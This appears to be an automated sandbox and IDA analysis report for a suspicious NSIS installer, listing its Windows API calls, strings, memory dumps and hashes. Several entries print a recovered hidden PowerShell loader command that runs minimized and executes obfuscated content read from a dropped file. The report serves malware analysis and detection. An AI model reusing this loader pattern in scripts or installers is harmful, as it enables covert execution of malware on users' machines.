• lstrcatA.KERNEL32(1033,Originals Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Originals Setup: Completed,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573410,"C:\Users\user\Desktop\HVSU7GbA5N.exe",00000000), ref: 00403689
• lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,1033,Originals Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Originals Setup: Completed,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 004036FE
• lstrcmpiA.KERNEL32(?,.exe), ref: 00403711
• GetFileAttributesA.KERNEL32(: Completed), ref: 0040371C
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens), ref: 00403765
  • Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28
• RegisterClassA.USER32(00422E80), ref: 004037A2
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037BA
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037EF
• ShowWindow.USER32(00000005,00000000), ref: 00403825
• LoadLibraryA.KERNELBASE(RichEd20), ref: 00403836
• LoadLibraryA.KERNEL32(RichEd32), ref: 00403841
• GetClassInfoA.USER32(00000000,RichEdit20A,00422E80), ref: 00403851
• GetClassInfoA.USER32(00000000,RichEdit,00422E80), ref: 0040385E
• RegisterClassA.USER32(00422E80), ref: 00403867
• DialogBoxParamA.USER32(?,00000000,004039A0,00000000), ref: 00403886
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Originals Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
• API String ID: 914957316-2049690784
• Opcode ID: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
• Instruction ID: a1152651de681702ec182a4452d53c4528d9546a1521c59b1686b62f96f1e611
• Opcode Fuzzy Hash: 04695480405891d431fb5b182ebd05ffb522bb116bc315d28555dd4449e2f2fa
• Instruction Fuzzy Hash: 966107B16442007FD7206F659D85F2B3AACEB4474AF40457FF840B62E1C7BD6D029A2E

Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
APIs
• GetTickCount.KERNEL32 ref: 00402C3A
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\HVSU7GbA5N.exe,00000400), ref: 00402C56
  • Part of subcall function 0040584E: GetFileAttributesA.KERNELBASE(00000003,00402C69,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00405852
  • Part of subcall function 0040584E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405874
• GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\HVSU7GbA5N.exe,C:\Users\user\Desktop\HVSU7GbA5N.exe,80000000,00000003), ref: 00402CA2
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\HVSU7GbA5N.exe$Error launching installer$F$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$J$Null$soft
• API String ID: 4283519449-3967052016
• Opcode ID: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
• Instruction ID: f25878a385a50b793721b7c2dc62060375717e7a9e735ffe9872fd5df72a7917
• Opcode Fuzzy Hash: 83888f2de956a22d0bc41c9bd18695b65df7ebb646604f4f840fd8a04a0cb393
• Instruction Fuzzy Hash: 7651F671A00215ABDB20AF65DE89F9E7BB8EB04315F10413BF904B62D1D7BC9E418B9D

Control-flow Graph (rendered graph image not reproduced; legend: Executed / Not Executed)
APIs
• lstrcatA.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,00000031), ref: 0040177E
• CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,00000000,00000000,"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" ,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,00000031), ref: 004017A8
  • Part of subcall function 00405BBD: lstrcpynA.KERNEL32(?,?,00000400,00403126,Originals Setup,NSIS Error), ref: 00405BCA
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
  • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
  • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $"powershell.exe" -windowstyle minimized "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens$C:\Users\user\AppData\Local\choktallenes\sprgekasserne.Tek$noncontamination\lftebevgelse\
• API String ID: 1941528284-867135988
• Opcode ID: eb6225978e445b6639c7fe847b1e005be462a1abc08e94cdbcc89d5a2522d826
• Instruction ID: 209590ddbc3a68456c4598a6b25cf33bb68440e8bdc93e33a46783fb3c58ae9b
• Opcode Fuzzy Hash: eb6225978e445b6639c7fe847b1e005be462a1abc08e94cdbcc89d5a2522d826
• Instruction Fuzzy Hash: 6F41C472900514BADF10BBA9DC46EAF3679EF01368F20823BF512F10E1D77C5A418AAD

Control-flow Graph: function 404ea6 (graph image not recoverable from the extracted page)

APIs
• lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
• lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
• lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
• SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID: Completed
• API String ID: 2531174081-3087654605
• Opcode ID: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
• Instruction ID: c9e29023339c79119f92ef6614343089cfde3ac0fe0689c8293f17bbb72fca3e
• Opcode Fuzzy Hash: 42d41b05157e019d59a8c95eb738bd9c3ef6bfcc5de6f75fe76b0678c24a36e0
• Instruction Fuzzy Hash: D0219DB2900118BEDF119FA5CD849DEBFB9EF44354F14807AF944B6291C3789E418BA8

Control-flow Graph: function 402e62 (graph image not recoverable from the extracted page)

APIs
• GetTickCount.KERNEL32 ref: 00402EC0
• GetTickCount.KERNEL32 ref: 00402F41
• MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F6E
• wsprintfA.USER32 ref: 00402F7E
• WriteFile.KERNELBASE(00000000,00000000,0040E888,00000000,00000000), ref: 00402FAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CountTick$FileWritewsprintf
• String ID: ... %d%%
• API String ID: 4209647438-2449383134
• Opcode ID: 59f1a083d79aa0a26b558a3a335eceb6c969644405dc0bbbd3de2fd8fa687a46
• Instruction ID: 884de2ce8814a110384bf9455658e7085e50030da519773910f3f0b9c7b3960d
• Opcode Fuzzy Hash: 59f1a083d79aa0a26b558a3a335eceb6c969644405dc0bbbd3de2fd8fa687a46
• Instruction Fuzzy Hash: 49519D7190120AABCF10DF65DA08A9F3BB8AB04395F14413BF800B72C0C7789E50DBAA

Control-flow Graph: function 401f68 (graph image not recoverable from the extracted page)

APIs
• GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
  • Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Completed,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
  • Part of subcall function 00404EA6: lstrcatA.KERNEL32(Completed,00402F92,00402F92,Completed,00000000,0040E888,00000000), ref: 00404F02
  • Part of subcall function 00404EA6: SetWindowTextA.USER32(Completed,Completed), ref: 00404F14
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
  • Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62
• LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
• GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
• FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
Strings
• `7B, xrefs: 00401FDD
• "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" , xrefs: 00401FE7
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
• String ID: "$Delfisk=Get-Content -Raw 'C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens\Sprngningen178.Gte';$Bats=$Delfisk.SubString(73884,3);.$Bats($Delfisk)" $`7B
• API String ID: 2987980305-3854630374
• Opcode ID: 6dc7458dcee08963799a638f2a333defd2c134256b54f09a04e7196953954384
• Instruction ID: aaf5afebff6e040c8f3edcccfb20df8df5b0ecb9331c565b7beb057a01dbb2d2
• Opcode Fuzzy Hash: 6dc7458dcee08963799a638f2a333defd2c134256b54f09a04e7196953954384
• Instruction Fuzzy Hash: 9121F672904211B6CF107FA48E8DA6E39B0AB44318F20823BF600B62D0D7BC4941DA5E

Control-flow Graph: function 40231c (graph image not recoverable from the extracted page)

                                                                                                                                            APIs
                                                                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                                                            • lstrlenA.KERNEL32(noncontamination\lftebevgelse\,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                                                            • RegSetValueExA.KERNELBASE(?,?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,noncontamination\lftebevgelse\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: noncontamination\lftebevgelse\
• API String ID: 1356686001-3804711476
• Opcode ID: bbf6a0b86b811ae7a9c2ce5d094f6befe46c2cc4ac6501f1fa9dc908f8b818e4
• Instruction ID: 3a938b5a8607202095c76e83426e5805640bb3b53fc5f2f09a26eea3e9d8e973
• Opcode Fuzzy Hash: bbf6a0b86b811ae7a9c2ce5d094f6befe46c2cc4ac6501f1fa9dc908f8b818e4
• Instruction Fuzzy Hash: 7711A2B1E00118BFEB10AFA4DE49EAF7678FB50358F10413AF905B61D1D7B86D01AA69

Control-flow Graph
control_flow_graph 672 4015b3-4015c6 call 4029fd call 4056e6 677 4015c8-4015e3 call 405678 CreateDirectoryA 672->677 678 40160a-40160d 672->678 685 401600-401608 677->685 686 4015e5-4015f0 GetLastError 677->686 680 401638-402181 call 401423 678->680 681 40160f-40162a call 401423 call 405bbd SetCurrentDirectoryA 678->681 693 402892-4028a1 680->693 681->693 695 401630-401633 681->695 685->677 685->678 689 4015f2-4015fb GetFileAttributesA 686->689 690 4015fd 686->690 689->685 689->690 690->685 695->693
APIs
  • Part of subcall function 004056E6: CharNextA.USER32(?,?,004210E0,?,00405752,004210E0,004210E0,?,?,75573410,0040549D,?,C:\Users\user\AppData\Local\Temp\,75573410,00000000), ref: 004056F4
  • Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 004056F9
  • Part of subcall function 004056E6: CharNextA.USER32(00000000), ref: 0040570D
• CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
• GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
• SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens,00000000,00000000,000000F0), ref: 00401622
Strings
• C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens, xrefs: 00401617
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
• String ID: C:\Users\user\AppData\Local\Chillum19\rustiness\attacheringens
• API String ID: 3751793516-2870171211
• Opcode ID: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
• Instruction ID: d075d57f09c15f05164e6e7227da82a4385631acf0310a11cf010d3362af65ee
• Opcode Fuzzy Hash: 341913b46653dc02a6b8c0ff5df98e195c602d220a8259587814e8818c9eeb9b
• Instruction Fuzzy Hash: 5F112531908150AFDB112F755D44E6F37B0EA62366768473BF891B22E2D23C0D42D62E

Control-flow Graph
control_flow_graph 698 40587d-405887 699 405888-4058b3 GetTickCount GetTempFileNameA 698->699 700 4058c2-4058c4 699->700 701 4058b5-4058b7 699->701 702 4058bc-4058bf 700->702 701->699 703 4058b9 701->703 703->702
APIs
• GetTickCount.KERNEL32 ref: 00405891
• GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058AB
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\HVSU7GbA5N.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-4029073079
• Opcode ID: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
• Instruction ID: 97602d992a1fc3ea541738fe691a17a98ed12bbd3b61733a4c4fd0f0c3479bd5
• Opcode Fuzzy Hash: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
• Instruction Fuzzy Hash: B0F05E367482086AEB109A55DC44B9B7B98DB91750F14C02AFD44AA190D6B099548B99

Control-flow Graph
control_flow_graph 704 401edc-401f00 call 4029fd GetFileVersionInfoSizeA 707 402892-4028a1 704->707 708 401f06-401f14 GlobalAlloc 704->708 708->707 709 401f1a-401f29 GetFileVersionInfoA 708->709 711 401f2b-401f42 VerQueryValueA 709->711 712 401f5f 709->712 711->712 714 401f44-401f5c call 405b1b * 2 711->714 712->707 714->712
APIs
• GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
• GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
• VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
  • Part of subcall function 00405B1B: wsprintfA.USER32 ref: 00405B28
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
• String ID:
• API String ID: 1404258612-0
• Opcode ID: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
• Instruction ID: 9b91fbd94c6ee64b88793a3c9b4d2d612c2f555b57ffdd8fee231bc1bbe1e40f
• Opcode Fuzzy Hash: d5295571afff2b7ba06b8940d0c237b1bfad39176bc142ff4da2a602cba8f496
• Instruction Fuzzy Hash: 37115E71A00108BEDB01EFA5D981DAEBBB9EF04344B20807AF505F21A2D7389E54DB28
APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
• CloseHandle.KERNEL32(?), ref: 004053A2
Strings
• Error launching installer, xrefs: 0040537F
Memory Dump Source
• Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
• Instruction ID: 6a75270a898cf8bf2a78dd2ca891eea3d0b09d4229ae2a6fcbb9112043bcd623
• Opcode Fuzzy Hash: 78f56604072923640aaa3b77c56e1735b9967a1a3caa926f278c393605d87831
• Instruction Fuzzy Hash: 5EE0BFB4A04209BFFB10EBA4ED45F7B7AADEB10788F408521BD14F2160D778A8108A79
APIs
  • Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
  • Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
  • Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\HVSU7GbA5N.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
  • Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2
• CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 004030A3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1453762285.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1453745512.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453832641.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1453905681.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1454047488.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_HVSU7GbA5N.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                                            • API String ID: 4115351271-3144792594
                                                                                                                                            • Opcode ID: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
                                                                                                                                            • Instruction ID: fee6ec1a5ad4de73206782a352265a6ade63d615f6b53232b42a3ca9793d762f
